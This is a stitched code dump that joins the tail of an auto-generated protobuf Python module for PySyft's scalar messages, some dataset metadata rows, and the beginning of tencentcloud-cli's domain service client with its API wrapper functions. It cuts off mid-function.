),
],
serialized_start=172,
serialized_end=356,
)
_INTERMEDIATEGAMMASCALAR = _descriptor.Descriptor(
name="IntermediateGammaScalar",
full_name="syft.core.adp.IntermediateGammaScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.IntermediateGammaScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=358,
serialized_end=418,
)
_GAMMASCALAR = _descriptor.Descriptor(
name="GammaScalar",
full_name="syft.core.adp.GammaScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.GammaScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="min_val",
full_name="syft.core.adp.GammaScalar.min_val",
index=1,
number=2,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="value",
full_name="syft.core.adp.GammaScalar.value",
index=2,
number=3,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="max_val",
full_name="syft.core.adp.GammaScalar.max_val",
index=3,
number=4,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="entity",
full_name="syft.core.adp.GammaScalar.entity",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="_min_val",
full_name="syft.core.adp.GammaScalar._min_val",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_value",
full_name="syft.core.adp.GammaScalar._value",
index=1,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_max_val",
full_name="syft.core.adp.GammaScalar._max_val",
index=2,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=421,
serialized_end=606,
)
_INTERMEDIATEPHISCALAR = _descriptor.Descriptor(
name="IntermediatePhiScalar",
full_name="syft.core.adp.IntermediatePhiScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.IntermediatePhiScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="entity",
full_name="syft.core.adp.IntermediatePhiScalar.entity",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="gamma",
full_name="syft.core.adp.IntermediatePhiScalar.gamma",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="_gamma",
full_name="syft.core.adp.IntermediatePhiScalar._gamma",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=609,
serialized_end=764,
)
_PHISCALAR = _descriptor.Descriptor(
name="PhiScalar",
full_name="syft.core.adp.PhiScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.PhiScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="min_val",
full_name="syft.core.adp.PhiScalar.min_val",
index=1,
number=2,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="value",
full_name="syft.core.adp.PhiScalar.value",
index=2,
number=3,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="max_val",
full_name="syft.core.adp.PhiScalar.max_val",
index=3,
number=4,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="entity",
full_name="syft.core.adp.PhiScalar.entity",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="gamma",
full_name="syft.core.adp.PhiScalar.gamma",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="_min_val",
full_name="syft.core.adp.PhiScalar._min_val",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_value",
full_name="syft.core.adp.PhiScalar._value",
index=1,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_max_val",
full_name="syft.core.adp.PhiScalar._max_val",
index=2,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_gamma",
full_name="syft.core.adp.PhiScalar._gamma",
index=3,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=767,
serialized_end=1008,
)
_INTERMEDIATESCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_BASESCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_BASESCALAR.fields_by_name[
"entity"
].message_type = proto_dot_core_dot_adp_dot_entity__pb2._ENTITY
_BASESCALAR.oneofs_by_name["_min_val"].fields.append(
_BASESCALAR.fields_by_name["min_val"]
)
_BASESCALAR.fields_by_name["min_val"].containing_oneof = _BASESCALAR.oneofs_by_name[
"_min_val"
]
_BASESCALAR.oneofs_by_name["_value"].fields.append(_BASESCALAR.fields_by_name["value"])
_BASESCALAR.fields_by_name["value"].containing_oneof = _BASESCALAR.oneofs_by_name[
"_value"
]
_BASESCALAR.oneofs_by_name["_max_val"].fields.append(
_BASESCALAR.fields_by_name["max_val"]
)
_BASESCALAR.fields_by_name["max_val"].containing_oneof = _BASESCALAR.oneofs_by_name[
"_max_val"
]
_INTERMEDIATEGAMMASCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_GAMMASCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_GAMMASCALAR.fields_by_name[
"entity"
].message_type = proto_dot_core_dot_adp_dot_entity__pb2._ENTITY
_GAMMASCALAR.oneofs_by_name["_min_val"].fields.append(
_GAMMASCALAR.fields_by_name["min_val"]
)
_GAMMASCALAR.fields_by_name["min_val"].containing_oneof = _GAMMASCALAR.oneofs_by_name[
"_min_val"
]
_GAMMASCALAR.oneofs_by_name["_value"].fields.append(
_GAMMASCALAR.fields_by_name["value"]
)
_GAMMASCALAR.fields_by_name["value"].containing_oneof = _GAMMASCALAR.oneofs_by_name[
"_value"
]
_GAMMASCALAR.oneofs_by_name["_max_val"].fields.append(
_GAMMASCALAR.fields_by_name["max_val"]
)
_GAMMASCALAR.fields_by_name["max_val"].containing_oneof = _GAMMASCALAR.oneofs_by_name[
"_max_val"
]
_INTERMEDIATEPHISCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_INTERMEDIATEPHISCALAR.fields_by_name[
"entity"
].message_type = proto_dot_core_dot_adp_dot_entity__pb2._ENTITY
_INTERMEDIATEPHISCALAR.fields_by_name["gamma"].message_type = _GAMMASCALAR
_INTERMEDIATEPHISCALAR.oneofs_by_name["_gamma"].fields.append(
_INTERMEDIATEPHISCALAR.fields_by_name["gamma"]
)
_INTERMEDIATEPHISCALAR.fields_by_name[
"gamma"
].containing_oneof = _INTERMEDIATEPHISCALAR.oneofs_by_name["_gamma"]
_PHISCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_PHISCALAR.fields_by_name[
"entity"
].message_type = proto_dot_core_dot_adp_dot_entity__pb2._ENTITY
_PHISCALAR.fields_by_name["gamma"].message_type = _GAMMASCALAR
_PHISCALAR.oneofs_by_name["_min_val"].fields.append(
_PHISCALAR.fields_by_name["min_val"]
)
_PHISCALAR.fields_by_name["min_val"].containing_oneof = _PHISCALAR.oneofs_by_name[
"_min_val"
]
_PHISCALAR.oneofs_by_name["_value"].fields.append(_PHISCALAR.fields_by_name["value"])
_PHISCALAR.fields_by_name["value"].containing_oneof = _PHISCALAR.oneofs_by_name[
"_value"
]
_PHISCALAR.oneofs_by_name["_max_val"].fields.append(
_PHISCALAR.fields_by_name["max_val"]
)
_PHISCALAR.fields_by_name["max_val"].containing_oneof = _PHISCALAR.oneofs_by_name[
"_max_val"
]
_PHISCALAR.oneofs_by_name["_gamma"].fields.append(_PHISCALAR.fields_by_name["gamma"])
_PHISCALAR.fields_by_name["gamma"].containing_oneof = _PHISCALAR.oneofs_by_name[
"_gamma"
]
DESCRIPTOR.message_types_by_name["IntermediateScalar"] = _INTERMEDIATESCALAR
DESCRIPTOR.message_types_by_name["BaseScalar"] = _BASESCALAR
DESCRIPTOR.message_types_by_name["IntermediateGammaScalar"] = _INTERMEDIATEGAMMASCALAR
DESCRIPTOR.message_types_by_name["GammaScalar"] = _GAMMASCALAR
DESCRIPTOR.message_types_by_name["IntermediatePhiScalar"] = _INTERMEDIATEPHISCALAR
DESCRIPTOR.message_types_by_name["PhiScalar"] = _PHISCALAR
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
IntermediateScalar = _reflection.GeneratedProtocolMessageType(
"IntermediateScalar",
(_message.Message,),
{
"DESCRIPTOR": _INTERMEDIATESCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.IntermediateScalar)
},
)
_sym_db.RegisterMessage(IntermediateScalar)
BaseScalar = _reflection.GeneratedProtocolMessageType(
"BaseScalar",
(_message.Message,),
{
"DESCRIPTOR": _BASESCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.BaseScalar)
},
)
_sym_db.RegisterMessage(BaseScalar)
IntermediateGammaScalar = _reflection.GeneratedProtocolMessageType(
"IntermediateGammaScalar",
(_message.Message,),
{
"DESCRIPTOR": _INTERMEDIATEGAMMASCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.IntermediateGammaScalar)
},
)
_sym_db.RegisterMessage(IntermediateGammaScalar)
GammaScalar = _reflection.GeneratedProtocolMessageType(
"GammaScalar",
(_message.Message,),
{
"DESCRIPTOR": _GAMMASCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.GammaScalar)
},
)
_sym_db.RegisterMessage(GammaScalar)
IntermediatePhiScalar = _reflection.GeneratedProtocolMessageType(
"IntermediatePhiScalar",
(_message.Message,),
{
"DESCRIPTOR": _INTERMEDIATEPHISCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.IntermediatePhiScalar)
},
)
_sym_db.RegisterMessage(IntermediatePhiScalar)
PhiScalar = _reflection.GeneratedProtocolMessageType(
"PhiScalar",
(_message.Message,),
{
"DESCRIPTOR": _PHISCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.PhiScalar)
},
)
_sym_db.RegisterMessage(PhiScalar)
# @@protoc_insertion_point(module_scope)
| 32.921308
| 1,815
| 0.623028
| 2,933
| 27,193
| 5.395159
| 0.057961
| 0.040445
| 0.064838
| 0.066544
| 0.835313
| 0.804285
| 0.740331
| 0.689017
| 0.680801
| 0.680801
| 0
| 0.034491
| 0.273931
| 27,193
| 825
| 1,816
| 32.961212
| 0.766967
| 0.024124
| 0
| 0.757962
| 1
| 0.001274
| 0.156793
| 0.124477
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007643
| 0
| 0.007643
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81736639ac28a4db56d5007f839f5b46e6f9547f
| 71,358
|
py
|
Python
|
tccli/services/domain/domain_client.py
|
tencentcloudapi-test/tencentcloud-cli
|
da9733765df2b405b83b7acff48256f31e053ab1
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/domain/domain_client.py
|
tencentcloudapi-test/tencentcloud-cli
|
da9733765df2b405b83b7acff48256f31e053ab1
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/domain/domain_client.py
|
tencentcloudapi-test/tencentcloud-cli
|
da9733765df2b405b83b7acff48256f31e053ab1
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import six
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError, ClientError, ParamError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.domain.v20180808 import domain_client as domain_client_v20180808
from tencentcloud.domain.v20180808 import models as models_v20180808
from jmespath import search
import time
def doSetDomainAutoRenew(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SetDomainAutoRenewRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.SetDomainAutoRenew(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCheckBatchStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CheckBatchStatusRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CheckBatchStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUploadImage(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.UploadImageRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.UploadImage(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSendPhoneEmailCode(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SendPhoneEmailCodeRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.SendPhoneEmailCode(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDomainNameList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDomainNameListRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeDomainNameList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeletePhoneEmail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeletePhoneEmailRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeletePhoneEmail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
